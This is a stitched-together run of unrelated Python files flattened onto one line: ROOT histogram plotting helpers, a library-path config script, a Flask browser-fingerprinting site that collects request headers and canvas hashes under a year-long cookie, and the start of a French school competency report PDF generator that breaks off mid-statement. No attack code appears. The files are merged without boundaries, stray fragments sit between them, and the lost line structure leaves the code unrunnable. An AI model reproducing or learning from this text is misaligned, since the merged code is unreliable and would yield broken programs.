self.tcanvas.get_axis_factor(1) #leg = hl.self_legend(1, '', x1=10, x2=18, y1=1e-6, y2=5.e-4, option='br') leg = hl.self_legend(1, '', self.lx1, self.ly1, self.lx2, self.ly2, option='br') for i,st in enumerate(legtitle): if i == 0: continue leg.AddEntry(0, st, '') pad_width = ROOT.gPad.XtoPixel(ROOT.gPad.GetX2()) pad_height = ROOT.gPad.YtoPixel(ROOT.gPad.GetY1()) #print pad_width, pad_height pxlsize = 16. if pad_width < pad_height: #charheight = textsize*pad_width; textsize = pxlsize / pad_width else: #charheight = textsize*pad_height; textsize = pxlsize / pad_height fsize = 1 #print xf, yf, xf * yf, fsize, textsize leg.SetTextSize(textsize) leg.Draw() self.tcanvas.tc.Update() def adjust_pads(self): for i,hl in enumerate(self.lists): hl.adjust_to_pad(self.lists[0].pad) def pdf(self): self.tcanvas.Print(pyutils.to_file_name(self.name)+'.pdf','.pdf') def png(self): self.tcanvas.Print(pyutils.to_file_name(self.name)+'.png','.png') def write_all(self, mod='', opt='RECREATE'): for i,hl in enumerate(self.lists): hl.write_to_file(opt=opt, name_mod = mod) def update(self, logy=False): for l in self.lists: l.update(logy=logy) def get_pads(self): self.pads = [] for ip in [ self.tcanvas.cd(i+1) for i in range(len(self.lists)) ]: self.pads.append(ip) return self.pads def set_grid_x(self, what=True): for p in self.get_pads(): p.SetGridx(what) p.Update() def set_grid_y(self, what=True): for p in self.get_pads(): p.SetGridy(what) p.Update() def set_log_axis(self, axis='', what=True): for p in self.get_pads(): if 'x' in axis: p.SetLogx(what) if 'y' in axis: p.SetLogy(what) if 'z' in axis: p.SetLogz(what) p.Update() gDebugLists = ListStorage() gDL = gDebugLists def load_tlist(tlist, pattern=None, names_not_titles=True, draw_opt='HIST', hl = None): listname = tlist.GetName() if hl == None: hl = ol(listname) for obj in tlist: to_load=False if pattern: if pattern in obj.GetName(): to_load=True else: to_load=False else: to_load=True if to_load: if names_not_titles == True: newname = "{}:{}".format(tlist.GetName(), obj.GetName()) hl.add (obj, newname, draw_opt) #hl.addh (obj, newname, draw_opt) #hl.addgr(obj, newname) #hl.addf (obj, newname, 'L') else: hl.add (obj, draw_opt=draw_opt) #hl.addh(obj, draw_opt=draw_opt) #hl.addgr(obj) #hl.addf(obj, None, 'L') #print '[i] add :',obj.GetName() else: #print '[i] ignore:',obj.GetName() pass return hl def load_file(fname='', pattern=None, names_not_titles=True, draw_opt='', xmin=None, xmax=None): if not fname: return None fin = None try: fin = ROOT.TFile(fname) except: print('[e] root file open failed for',fname, file=sys.stderr) return None listname = fname.replace('/','_')+'-'+'-hlist' if pattern: listname = fname.replace('/','_')+'-'+pattern.replace(' ','-')+'-hlist' hl = dlist(listname) if xmin!=None and xmax!=None: hl = make_list(listname, xmin, xmax) lkeys = fin.GetListOfKeys() for key in lkeys: if key.GetClassName() == "TList": load_tlist(key.ReadObj(), pattern, names_not_titles, draw_opt, hl) to_load=False if pattern: if pattern in key.GetName(): to_load=True else: to_load=False else: to_load=True if to_load: obj = key.ReadObj() if names_not_titles: hl.add(obj, obj.GetName(), draw_opt) hl.last().obj.SetName(key.GetName()) else: hl.add(obj, '', draw_opt=draw_opt) hl.last().obj.SetName(key.GetName()) #print '[i] add :',key.GetName() else: #print '[i] ignore:',key.GetName() pass fin.Close() if len(hl.l) <= 0: print('[w] No entries in the list!', file=sys.stderr) return hl def show_file(fname='', logy=False, pattern=None, draw_opt='p', names_not_titles=True, xmin=None, xmax=None, ymin=None, ymax=None): tu.setup_basic_root() #ROOT.gROOT.Reset() #ROOT.gStyle.SetScreenFactor(1) hl = load_file(fname, pattern, names_not_titles, draw_opt, xmin, xmax) hl.pattern = pattern if not hl.has2D(): hl.make_canvas() hl.tcanvas.Divide(2,1) hl.tcanvas.cd(1) if 'self' in draw_opt: hl.draw(draw_opt, None, None, logy) else: #hl.colorize() #hl.markerize() #hl.lineize() if xmin!=None and xmax!=None: hl.zoom_axis(0, xmin, xmax) hl.draw(draw_opt, ymin, ymax, logy) if logy: ROOT.gPad.SetLogy() if tu.is_arg_set('--logx'): ROOT.gPad.SetLogx() exs = ' '.join(sys.argv) exs = exs.replace(sys.argv[0], 'show_file:') fnsize = float(1.5/len(exs)) du.draw_comment(exs, fnsize, 0, 0.9, 1., 1.) # ::draw_comment was ol method at some point hl.tcanvas.cd(2) #hl.draw_legend(1,fname+'[{0}]'.format(pattern)) hl.self_legend(1, fname + ' [ {0} ]'.format(pattern), 0.0, 0.0, 1, 1) hl.tcanvas.Update() #the one below is better (?) #ROOT.gPad.Update() return hl def make_ratio(h1, h2): hl = dlist('ratio {} div {}'.format(h1.GetName(), h2.GetName()).replace(' ', '_')) newname = '{}_div_{}'.format(h1.GetName(), h2.GetName()) newtitle = '{} / {}'.format(h1.GetTitle(), h2.GetTitle()) hr = h1.Clone(newname) hr.SetTitle(newtitle) if h1.InheritsFrom('TGraph') and h2.InheritsFrom('TGraph'): divide_graphs(hr, h2) else: hr.SetDirectory(0) hr.Divide(h2) hl.add(hr, newtitle, 'p') hl.reset_axis_titles(None, newtitle) return hl def make_sum(h1, h2, w=1.): hl = dlist('sum {} and {} w{}'.format(h1.GetName(), h2.GetName(), w).replace(' ', '_')) newname = '{}_and_{}_w={}'.format(h1.GetName(), h2.GetName(), w) newtitle = 'sum {} + {} w={}'.format(h1.GetTitle(), h2.GetTitle(), w) hr = h1.Clone(newname) hr.SetTitle(newtitle) if h1.InheritsFrom('TGraph') and h2.InheritsFrom('TGraph'): add_graphs(hr, h2, w) else: hr.SetDirectory(0) hr.Add(h2, w) hl.add(hr, newtitle, 'p') hl.reset_axis_titles(None, newtitle) return hl def scale_errors(h, val): for i in range(1, h.GetNbinsX()): err = h.GetBinError(i) h.SetBinError(i, err * val) def reset_errors(h, herr, relative=False): for i in range(1, h.GetNbinsX()): if h.GetBinContent(i) == 0 and h.GetBinError(i) == 0: continue err = herr.GetBinError(i) if relative == True: if herr.GetBinContent(i) != 0: relat = h.GetBinContent(i) / herr.GetBinContent(i) else: relat = 1. err = err * relat h.SetBinError(i, err) def reset_points(h, xmin, xmax, val=0.0, err=0.0): for ib in range(1, h.GetNbinsX()+1): if h.GetBinCenter(ib) > xmin and h.GetBinCenter(ib) < xmax: h.SetBinContent(ib, val) h.SetBinError(ib, err) #yields above threshold - bin-by-bin def yats(olin): oret = dlist(olin.name + '_yat') oret.copy(olin) for idx,ho in enumerate(oret.l): h = ho.obj h.Reset() hin = olin.l[idx].obj for ib in range(1, hin.GetNbinsX()): maxbin = hin.GetNbinsX() yat = hin.Integral(ib, maxbin, "width") h.SetBinContent(ib, yat) #oret.lopts[idx] = olin.lopts[idx] # not needed - within copy return oret def fractional_yats(olin, refidx=-1): oret = dlist(olin.name + '_fyat') oret.copy(olin) integRef = 1. if refidx >= 0: hin = olin.l[refidx].obj maxbin = hin.GetNbinsX() integRef = hin.Integral(1, maxbin, "width") for idx,ho in enumerate(oret.l): h = ho.obj h.Reset() hin = olin.l[idx].obj maxbin = hin.GetNbinsX() integ = hin.Integral(1, maxbin, "width") if integ <= 0: print("[w] integral ? ",integ) integ = -1. for ib in range(1, maxbin): if refidx >= 0: yat = hin.Integral(ib, maxbin, "width") / integRef else: yat = hin.Integral(ib, maxbin, "width") / integ h.SetBinContent(ib, yat) #oret.lopts[idx] = olin.lopts[idx] # not needed - within copy return oret def rejs(olin): oret = ol(olin.name + '_rej') oret.copy(olin) for h in oret.l: h.Reset() idx = oret.l.index(h) hin = olin.l[idx] for ib in range(1, hin.GetNbinsX()): maxbin = hin.GetNbinsX() yat = hin.Integral(ib , maxbin) yatp1 = hin.Integral(1 , maxbin) h.SetBinContent(ib, yat/yatp1) return oret def filter_single_entries_h(h, href=None, thr=10): if href == None: href = h for ib in range(1, h.GetNbinsX()+1): if href.GetBinContent(ib) < thr: h.SetBinContent(ib, 0) h.SetBinError(ib, 0) def filter_single_entries_h2d(h, href=None, thr=10): if href == None: href = h for ib in range(1, h.GetNbinsX()+1): for iby in range(1, h.GetNbinsY()+1): if href.GetBinContent(ib, iby) < thr: h.SetBinContent(ib, iby, 0) h.SetBinError(ib, iby, 0) def filter_single_entries(hl, hlref, thr=10): for ih in range(len(hl.l)): h = hl.l[ih].obj href = hlref.l[ih].obj for ib in range(h.GetNbinsX()+1): if href.GetBinContent(ib) < thr: h.SetBinContent(ib, 0) h.SetBinError(ib, 0) def filter_single_entries_2d(hl, hlref, thr=10): for ih in range(len(hl.l)): h = hl.l[ih].obj href = hlref.l[ih].obj for ib in range(1, h.GetNbinsX()+1): for iby in range(1, h.GetNbinsY()+1): if href.GetBinContent(ib, iby) < thr: h.SetBinContent(ib, iby, 0) h.SetBinError(ib, iby, 0) def get_projection_axis(hname, h2d, axis, ixmin=0, ixmax=105): if axis == 1: ixminb = h2d.GetXaxis().FindBin(ixmin) ixmaxb = h2d.GetXaxis().FindBin(ixmax) if ixmaxb > h2d.GetXaxis().GetNbins(): imaxb = h2d.GetXaxis().GetNbins() hproj = h2d.ProjectionY(hname, ixminb, ixmaxb) else: ixminb = h2d.GetYaxis().FindBin(ixmin) ixmaxb = h2d.GetYaxis().FindBin(ixmax) if ixmaxb > h2d.GetYaxis().GetNbins(): imaxb = h2d.GetYaxis().GetNbins() hproj = h2d.ProjectionX(hname, ixminb, ixmaxb) return hproj def get_projectionY(hname, h2d, ixmin=0, ixmax=105): return get_projection_axis(hname, h2d, 1, ixmin=0, ixmax=105) def get_projections_axis_bins(hname, fname, htitle, opt, axis, pTs): h2d = tu.get_object_from_file(hname, fname, htitle + '2d') if h2d == None: print('[i] unable to get:',hname,'from:',fname) return None pTmin = pTs[0][0] pTmax = pTs[len(pTs)-1][1] hlname = 'projections-{}-{}-{}-{}-{}'.format(hname, fname, htitle, pTmin, pTmax) hl = dlist(hname+htitle) for i in range(len(pTs)): pTmin = pTs[i][0] pTmax = pTs[i][1] htitlepy = '{} [{}-{}]'.format(htitle, pTmin, pTmax) if axis == 1: hn = '{}-py-{}-{}'.format(hname, pTmin, pTmax) else: hn = '{}-px-{}-{}'.format(hname, pTmin, pTmax) hp = get_projection_axis(hn, h2d, axis, pTmin, pTmax) hp.Sumw2() hl.append(hp, htitlepy, 'P L HIST') return hl def get_projections_axis(hname, fname, htitle, pTmin, pTmax, step, opt='P L HIST', axis = 1, pTs=None): h2d = tu.get_object_from_file(hname, fname, htitle + '2d') if h2d == None: print('[i] unable to get:',hname,'from:',fname) return None hlname = 'projections-{}-{}-{}-{}-{}-{}'.format(hname, fname, htitle, pTmin, pTmax, step) hl = dlist(hname+htitle) pT = pTmin while pT + step < pTmax: if pTs != None: pTs.append(pT) htitlepy = '{} [{}-{}]'.format(htitle, pT, pT + step) if axis == 1: hn = '{}-py-{}-{}'.format(hname, pT, pT + step) else: hn = '{}-px-{}-{}'.format(hname, pT, pT + step) hp = get_projection_axis(hn, h2d, axis, pT, pT + step) hp.Sumw2() hl.append(hp, htitlepy, 'P L HIST') pT = pT + step return hl def get_projections_axis_lowcut(hname, fname, htitle, pTmin, pTmax, step, opt='P L HIST', axis = 1, pTs=None): h2d = tu.get_object_from_file(hname, fname, htitle + '2d') if h2d == None: print('[i] unable to get:',hname,'from:',fname) return None hlname = 'projections-{}-{}-{}-{}-{}-{}'.format(hname, fname, htitle, pTmin, pTmax, step) hl = dlist(hname+htitle) pT = pTmin Amax = h2d.GetXaxis().GetXmax() if axis == 0: Amax = h2d.GetYaxis().GetXmax() while pT + step <= pTmax: if pTs != None: pTs.append(pT) htitlepy = '{} [{}-{}]'.format(htitle, pT, Amax) if axis == 1: hn = '{}-py-{}-{}'.format(hname, pT, Amax) else: hn = '{}-px-{}-{}'.format(hname, pT, Amax) hp = get_projection_axis(hn, h2d, axis, pT, Amax) hp.Sumw2() hl.append(hp, htitlepy, 'P L HIST') pT = pT + step return hl def get_projections(hname, fname, htitle, pTmin, pTmax, step, opt='P L HIST', pTs=None): return get_projections_axis(hname, fname, htitle, pTmin, pTmax, step, opt, 1, pTs) def get_projectionsY(hname, fname, htitle, pTmin, pTmax, step, opt='P L HIST', pTs=None): return get_projections_axis(hname, fname, htitle, pTmin, pTmax, step, opt, 1, pTs) def get_projectionsX(hname, fname, htitle, pTmin, pTmax, step, opt='P L HIST', pTs=None): return get_projections_axis(hname, fname, htitle, pTmin, pTmax, step, opt, 0, pTs) def make_graph_xy(name, x, y, xe = [], ye = []): xf = [] yf = [] xef = [] yef = [] for v in x: xf.append(float(v)) for v in y: yf.append(float(v)) xa = array('f', xf) ya = array('f', yf) if len(xe) == 0: for ix in x: xef.append(0) else: for v in xe: xef.append(float(v)) xae = array('f', xef) if len(ye) == 0: for iy in y: yef.append(0) else: for v in ye: yef.append(float(v)) yae = array('f', yef) if len(ye) == 0 and len(xe) == 0: gr = ROOT.TGraph(len(xf), xa, ya) else: gr = ROOT.TGraphErrors(len(xf), xa, ya, xae, yae) gr.SetName(name) return gr def make_graph(name, data): x = [] y = [] xe = [] ye = [] for ix in data: x.append(ix[0]) y.append(ix[1]) try: xe.append(ix[2]) except: pass try: ye.append(ix[3]) except: pass return make_graph_xy(name, x, y, xe, ye) def make_graph_ae_xy(name, x, y, xlow = [], xhigh = [], ylow = [], yhigh = []): xf = array('f', x) yf = array('f', y) zs = [] for i in range(len(x)): zs.append(0) if len(xlow) > 0: xflow = array('f', xlow) else: xflow = array('f', zs) if len(xhigh) > 0: xfhigh = array('f', xhigh) else: xfhigh = array('f', zs) if len(ylow) > 0: yflow = array('f', ylow) else: yflow = array('f', zs) if len(yhigh) > 0: yfhigh = array('f', yhigh) else: yfhigh = array('f', zs) #print len(x), xf, yf, xflow, xfhigh, yflow, yfhigh gr = ROOT.TGraphAsymmErrors(len(x), xf, yf, xflow, xfhigh, yflow, yfhigh) gr.SetName(name) return gr def norm_error_graph(name, x, width, y, ymin, ymax=-1): ax = [x - width/2.] xl = [width/2.] xh = [width/2.] ay = [y] yl = [ymin] yh = [ymax] if ymax < 0: yh = [ymin] return make_graph_ae_xy(name, ax, ay, xl, xh, yl, yh) def make_list(name, xmin, xmax): hl = dlist(name) gr = ROOT.TGraph(2) gr.SetPoint(0, xmin, 0) gr.SetPoint(1, xmax, 0) hl.add(gr, 'fake', 'noleg hidden p') return hl def h_to_graph(h, drop_zero_entries=False, xerror=False, transpose=False): x = [] y = [] ex = [] ey = [] for ib in range(1,h.GetNbinsX()+1): if drop_zero_entries: if type(drop_zero_entries) is bool: ymin = 0.0 if (h.GetBinContent(ib)*h.GetBinContent(ib)) <= ymin: print('dropped bin bool', ib, h.GetBinContent(ib), ymin) continue else: ymin = drop_zero_entries if h.GetBinContent(ib) <= ymin: print('dropped bin', ib, h.GetBinContent(ib), ymin) continue x.append(h.GetBinCenter(ib)) y.append(h.GetBinContent(ib)) if xerror == True: ex.append(h.GetBinCenter(ib) - h.GetBinLowEdge(ib)) else: ex.append(0) ey.append(h.GetBinError(ib)) name = h.GetName() + '_to_graph' title = h.GetTitle() if transpose: gr = make_graph_xy(name, y, x, ey, ex) else: gr = make_graph_xy(name, x, y, ex, ey) gr.SetTitle(title) return gr def scale_graph_errors(gr, axis, scale=1.): if gr.InheritsFrom('TGraphErrors'): for i in range(gr.GetN()): if axis == 0: gr.GetEX()[i] = gr.GetEX()[i] * scale else: gr.GetEY()[i] = gr.GetEY()[i] * scale if gr.InheritsFrom('TGraphAsymmErrors'): for i in range(gr.GetN()): if axis == 0: gr.GetEXlow()[i] = gr.GetEXlow()[i] * scale gr.GetEXhigh()[i] = gr.GetEXhigh()[i] * scale else: gr.GetEYlow()[i] = gr.GetEYlow()[i] * scale gr.GetEYhigh()[i] = gr.GetEYhigh()[i] * scale def scale_by_binwidth(h, modifYtitle = True): if h.InheritsFrom('TH1'): if h.GetSumw2() == None: h.Sumw2() if h.GetBinWidth(1) == h.GetBinWidth(2): bw = h.GetBinWidth(1) if modifYtitle == True: newytitle = h.GetYaxis().GetTitle() + ' / {}'.format(bw) h.GetYaxis().SetTitle(newytitle) h.Scale(1./bw) else: for ib in range(1, h.GetNbinsX() + 1): v = h.GetBinContent(ib) v = v / h.GetBinWidth(ib) ve = h.GetBinError(ib) ve = ve / h.GetBinWidth(ib) h.SetBinContent(ib, v) h.SetBinError(ib, ve) if modifYtitle == True: newytitle = h.GetYaxis().GetTitle() + ' / {}'.format('BW') h.GetYaxis().SetTitle(newytitle) else: print('[w] normalize not defined for non histogram...') 10-100 # coding=utf-8 import os # 获取上级目录的绝对路径 last_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "..")) # 获取lib LIB_DIR = os.path.join(last_dir, u"lib") LINUX_X64_DIR = os.path.join(LIB_DIR, u"linux_x64") WINDOWS_DIR = os.path.join(LIB_DIR, u"windows") WIN32_DIR = os.path.join(LIB_DIR, u"win32") WIN64_DIR = os.path.join(LIB_DIR, u"win64") def test(): print(LIB_DIR) print(LINUX_X64_DIR) print(WIN32_DIR) if __name__ == '__main__': test() import base64 import json import os from datetime import datetime, timedelta from hashlib import sha256 import flask from . import app from . import database from . import util USER_ID_KEY = 'user-id' @app.route('/') def home(): return flask.render_template( 'home.html', readonly_mode=util.readonly_mode() ) @app.route('/results') def results(): initial_request_stats, initial_request_total, initial_request_unique =\ database.get_stats(database.InitialRequestFingerprint) js_stats, js_total, js_unique =\ database.get_stats(database.JavaScriptFingerprint) return flask.render_template( 'results.html', initial_request_stats=initial_request_stats, initial_request_total=initial_request_total, initial_request_unique=initial_request_unique, js_stats=js_stats, js_total=js_total, js_unique=js_unique, format_database_column_name=util.format_database_column_name, get_percentage=util.get_percentage ) @app.route('/fingerprint') def fingerprint(): collection_datetime = datetime.utcnow() response = flask.make_response() user_id = flask.request.cookies.get(USER_ID_KEY) if user_id is None: user_id = new_user_id() max_age = 365 * 24 * 3600 expires = datetime.utcnow() + timedelta(days=365) if not util.readonly_mode(): response.set_cookie( USER_ID_KEY, user_id, max_age=max_age, expires=expires ) headers = request_headers( 'User-Agent', 'Accept', 'Accept-Language', 'Accept-Encoding', 'DNT', 'Upgrade-Insecure-Requests' ) results = database.add_fingerprint( database.InitialRequestFingerprint, user_id, collection_datetime, headers ) response.set_data( flask.render_template( 'fingerprint.html', **results ) ) return response def new_user_id(): user_id = base64.b64encode(os.urandom(18)).decode() assert not database.cookie_id_already_exists(user_id), \ f"cookie ID '{user_id}' already exists (this should never happen)" return user_id @app.route('/fingerprint-js', methods=['POST']) def fingerprint_js(): collection_datetime = datetime.utcnow() user_id = flask.request.cookies.get(USER_ID_KEY) headers = request_headers( 'User-Agent', 'Accept-Language', 'Accept-Encoding', 'DNT' ) other_data = json.loads(flask.request.form['fingerprint']) process_js_data(other_data) results = database.add_fingerprint( database.JavaScriptFingerprint, user_id, collection_datetime, headers, js_data=other_data ) return flask.jsonify(**results) def request_headers(*headers): return [(header, flask.request.headers.get(header)) for header in headers] def process_js_data(js_data): canvas = next(pair for pair in js_data if pair[0] == 'Canvas hash') canvas[1] = canvas_hash(canvas[1]) webgl = next(pair for pair in js_data if pair[0] == 'WebGL hash') webgl[1] = canvas_hash(webgl[1]) def canvas_hash(canvas_str): if canvas_str == 'undefined': return canvas_str return sha256(canvas_str.encode()).hexdigest() @app.route('/error-report', methods=['POST']) def error_report(): form = flask.request.form report = '\n'.join('{}: {}'.format(k, form[k]) for k in form) print('ERROR REPORT:\n' + report) return flask.render_template('error-report.html') @app.route('/about') def about(): return flask.render_template('about.html') @app.route('/contact') def contact(): return flask.render_template('contact.html') kreako/soklaki from collections import defaultdict from zipfile import ZipFile from datetime import date import json import re from pydantic import BaseModel, Field from fastapi.responses import FileResponse from fastapi.exceptions import HTTPException from typing import Optional from fpdf import FPDF, HTMLMixin from path import Path import jwt from gql_client import GqlClientException CURRENT_DIR = Path(__file__).abspath().dirname() class HasuraHeaders(BaseModel): x_hasura_user_id: int = Field(alias="x-hasura-user-id") x_hasura_user_group: int = Field(alias="x-hasura-user-group") class ReportData(BaseModel): student_id: int period_id: int class ReportInput(BaseModel): input: ReportData session_variables: HasuraHeaders class ReportOutput(BaseModel): report_id: int pdf_path: str json_path: str async def report(gql_client, reports_dir, input: ReportInput): # Gather data - will check permissions and raise HTTPException(500) if necessary data = await gql_report( gql_client, input.input.student_id, input.input.period_id, input.session_variables.x_hasura_user_id, input.session_variables.x_hasura_user_group, ) # Now generation pdf = PDF() # Header pdf.add_page() with pdf.edit().font_bold().text_lg().text_black() as e: e.write("Rapport d'évaluation du socle commun", align="C") e.write(f"{data['period']['group']['name']}", align="C") e.write( f"{data['student']['firstname']} {data['student']['lastname']} - {data['student']['cycle']}", align="C", ) e.empty_line() y_start_of_general_info = pdf.get_y() output_general_info(pdf, data) # Graphics data pdf.set_y(pdf.get_y() + 30) # Per domains for l1 in data["socle"]: domain = data["container_by_id"][l1["id"]] with pdf.edit().style_label() as e: e.write(f"{domain['full_rank']} {domain['text']}") output_bar_progression( pdf, data["evaluations_count_by_domain_status"][l1["id"]]["NotAcquired"], data["evaluations_count_by_domain_status"][l1["id"]]["InProgress"], data["evaluations_count_by_domain_status"][l1["id"]]["Acquired"], data["evaluations_count_by_domain_status"][l1["id"]]["TipTop"], data["evaluations_count_by_domain"][l1["id"]], ) pdf.set_y(pdf.get_y() + 1) # Total pdf.set_y(pdf.get_y() + 10) with pdf.edit().style_label() as e: e.write("Total") output_bar_progression( pdf, data["evaluations_count_by_status"]["not_acquired"], data["evaluations_count_by_status"]["in_progress"], data["evaluations_count_by_status"]["acquired"], data["evaluations_count_by_status"]["tip_top"], data["evaluations_count_by_status"]["total"], ) # Legend pdf.set_y(y_start_of_general_info) output_legend(pdf) # Summary by competencies for l1_raw in data["socle"]: l1_id = l1_raw["id"] l1 = data["container_by_id"][l1_id] pdf.add_page() with pdf.edit().font_bold().text_gray_700() as e: e.write(f"{l1['full_rank']} {l1['text'].upper()}") for l2_idx, l2_raw in enumerate(l1_raw["children"]): l2_id = l2_raw["id"] l2 = data["container_by_id"][l2_id] with pdf.edit().text_gray_700() as e: if l2_idx > 0: e.empty_line() e.write(f"{l2['full_rank']} {l2['text']}") e.empty_line() if l2_raw["competencies"]: output_competency_legend(pdf) for competency_raw in l2_raw["competencies"]: competency_id = competency_raw["id"] output_competency_table(pdf, competency_id, data) if l1_raw["competencies"]: output_competency_legend(pdf) for competency_raw in l1_raw["competencies"]: competency_id = competency_raw["id"] output_competency_table(pdf, competency_id, data) # Details of competencies pdf.add_page() for l1_idx, l1_raw in enumerate(data["socle"]): l1_id = l1_raw["id"] l1 = data["container_by_id"][l1_id] output_domain_needed = True def output_domain(): nonlocal output_domain_needed if output_domain_needed: # pdf.add_page() with pdf.edit().font_bold().text_gray_700() as e: if l1_idx > 0: e.empty_line() e.empty_line() e.write(f"{l1['full_rank']} {l1['text'].upper()}") output_domain_needed = False for l2_idx, l2_raw in enumerate(l1_raw["children"]): l2_id = l2_raw["id"] l2 = data["container_by_id"][l2_id] output_sub_domain_needed = True def output_sub_domain(): nonlocal output_sub_domain_needed if output_sub_domain_needed: with pdf.edit().text_gray_700() as e: if l2_idx > 0: e.empty_line() e.write(f"{l2['full_rank']} {l2['text']}") e.empty_line() output_sub_domain_needed = False for competency_raw in l2_raw["competencies"]: competency_id = competency_raw["id"] output_competency( pdf, competency_id, data, output_domain, output_sub_domain ) for competency_raw in l1_raw["competencies"]: competency_id = competency_raw["id"] output_competency( pdf, competency_id, data, output_domain, output_sub_domain ) # Eval comments pdf.add_page() with pdf.edit().font_bold().text_lg().text_black() as e: e.write("Commentaire") e.empty_line() if data["comments"]: with pdf.edit().style_normal() as e: e.write(f"{data['comments'][0]['text']}") # Observations pdf.add_page() with pdf.edit().font_bold().text_lg().text_black() as e: e.write("Annexe - Les observations") e.empty_line() for observation in data["observations"]: with pdf.edit().style_normal() as e: e.write(f"Observation pour :") with pdf.edit().style_label() as e: for c in observation["competencies"]: competency_id = c["competency_id"] competency = data["competency_by_id"][competency_id] e.write(f"{competency['full_rank']} {competency['text']}", indent=1) with pdf.edit().style_normal() as e: e.write(f"{observation['text']}") e.empty_line() # Output prefix = f"{data['period']['group']['name']}_{data['period']['name']}_{data['student']['cycle']}_{data['student']['firstname']}_{data['student']['lastname']}" prefix = make_safe_filename(prefix) pdf_fname = f"{prefix}.pdf" dirname = ( Path(reports_dir) / f"{data['period']['group_id']}" / f"{input.input.period_id}" ) dirname.makedirs_p() pdf_path = dirname / pdf_fname pdf.output(pdf_path) json_fname = f"{prefix}.json" json_path = dirname / json_fname with open(json_path, "w") as f: f.write(json.dumps(data, indent=2)) # Make older report inactive await inactivate_old_report( gql_client, input.input.student_id, input.input.period_id ) # Add the report to the database id = await insert_report( gql_client, input.input.student_id, data["student"]["cycle"], data["period"]["end"], json_path, pdf_path, ) return ReportOutput( report_id=id, pdf_path=pdf_path, json_path=json_path, ) def output_legend(pdf): with pdf.edit().fill_gray_200().text_sm() as e: y = pdf.get_y() e.rect(153, y, 47, e.line_height * 5) pdf.set_y(y + e.line_height / 2) with pdf.edit().text_sm() as e: y = pdf.get_y() e.fill_red_600() e.rect(188, y, 10, e.line_height) pdf.cell(w=176, h=e.line_height, txt="Maîtrise insuffisante", ln=1, align="R") y = pdf.get_y() e.fill_yellow_600() e.rect(188, y, 10, e.line_height) pdf.cell(w=176, h=e.line_height, txt="Maîtrise fragile", ln=1, align="R") y = pdf.get_y() e.fill_green_600() e.rect(188, y, 10, e.line_height) pdf.cell(w=176, h=e.line_height, txt="Maîtrise satisfaisante", ln=1, align="R") y = pdf.get_y() e.fill_pink_600() e.rect(188, y, 10, e.line_height) pdf.cell(w=176, h=e.line_height, txt="Très bonne maîtrise", ln=1, align="R") def output_general_info(pdf, data): with pdf.edit().style_label() as e: e.write("Date du rapport") with pdf.edit().style_normal() as e: e.write(f"{data['period']['end']}") with pdf.edit().style_label() as e: e.write("Nom") with pdf.edit().style_normal() as e: e.write(f"{data['student']['lastname']}") with pdf.edit().style_label() as e: e.write("Prénom") with pdf.edit().style_normal() as e: e.write(f"{data['student']['firstname']}") with pdf.edit().style_label() as e: e.write("Cycle") with pdf.edit().style_normal() as e: e.write(f"Cycle {data['student']['cycle'][-1]}") with pdf.edit().style_label() as e: e.write("Date d'anniversaire") with pdf.edit().style_normal() as e: e.write(f"{data['student']['birthdate']}") with pdf.edit().style_label() as e: e.write("Date d'entrée à l'école") with pdf.edit().style_normal() as e: e.write(f"{data['student']['school_entry']}") if data["student"]["school_exit"]: with pdf.edit().style_label() as e: e.write("Date de sortie de l'école") with pdf.edit().style_normal() as e: e.write(f"{data['student']['school_exit']}") def output_bar_progression(pdf, not_acquired, in_progress, acquired, tiptop, total): y = pdf.get_y() x = 10 with pdf.edit() as e: e.fill_gray_700() e.rect(10, y, 190, 8) l = 190 * not_acquired / total e.fill_red_600() e.rect(x, y + 1, l, 6) x += l l = 190 * in_progress / total e.fill_yellow_600() e.rect(x, y + 1, l, 6) x += l l = 190 * acquired / total e.fill_green_600() e.rect(x, y + 1, l, 6) x += l l = 190 * tiptop / total e.fill_pink_600() e.rect(x, y + 1, l, 6) pdf.set_y(y + 10) MARKER_WIDTH = 8 RIGHT_STOP = 200 - 4 * MARKER_WIDTH # 10 for page right margin def output_competency_table(pdf, competency_id, data): competency = data["competency_by_id"][competency_id] evaluations = data["evaluations_by_competency_id"][competency_id] if evaluations: status = evaluations[0]["status"] else: status = "InProgress" with pdf.edit().text_gray_700().draw_gray_900() as e: txt = f"{competency['full_rank']} {competency['text']}" lines = len( pdf.multi_cell( w=RIGHT_STOP - 10, # -10 for page left margin h=e.line_height, txt=txt, split_only=True, ) ) y = pdf.get_y() if y + lines * e.line_height >= 297 - 15 - 10: # 10 margin, 15 footer pdf.add_page() y = pdf.get_y() pdf.multi_cell( w=RIGHT_STOP - 10, # -10 for page left margin h=e.line_height, txt=txt, ln=1, align="L", border="BTRL", ) if status == "NotAcquired": e.fill_red_600() else: e.fill_white() e.rect(RIGHT_STOP + 0 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) e.borders(RIGHT_STOP + 0 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) if status == "InProgress": e.fill_yellow_600() else: e.fill_white() e.rect(RIGHT_STOP + 1 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) e.borders(RIGHT_STOP + 1 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) if status == "Acquired": e.fill_green_600() else: e.fill_white() e.rect(RIGHT_STOP + 2 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) e.borders(RIGHT_STOP + 2 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) if status == "TipTop": e.fill_pink_600() else: e.fill_white() e.rect(RIGHT_STOP + 3 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) e.borders(RIGHT_STOP + 3 * MARKER_WIDTH, y, MARKER_WIDTH, e.line_height * lines) def output_competency_legend(pdf): ANGLE = 60 y = pdf.get_y() pdf.set_y(y) pdf.set_x(RIGHT_STOP + 0 * MARKER_WIDTH + 2) with pdf.rotation(angle=ANGLE): with pdf.edit().text_xs() as e: pdf.cell( w=0, h=e.line_height, txt="Insuffisante", align="L", ln=1, ) pdf.set_y(y) pdf.set_x(RIGHT_STOP + 1 * MARKER_WIDTH + 2) with pdf.rotation(angle=ANGLE): with pdf.edit().text_xs() as e: pdf.cell( w=0, h=e.line_height, txt="Fragile", align="L", ln=1, ) pdf.set_y(y) pdf.set_x(RIGHT_STOP + 2 * MARKER_WIDTH + 2) with pdf.rotation(angle=ANGLE): with pdf.edit().text_xs() as e: pdf.cell( w=0, h=e.line_height, txt="Satisfaisante", align="L", ln=1, ) pdf.set_y(y) pdf.set_x(RIGHT_STOP + 3 * MARKER_WIDTH + 2) with 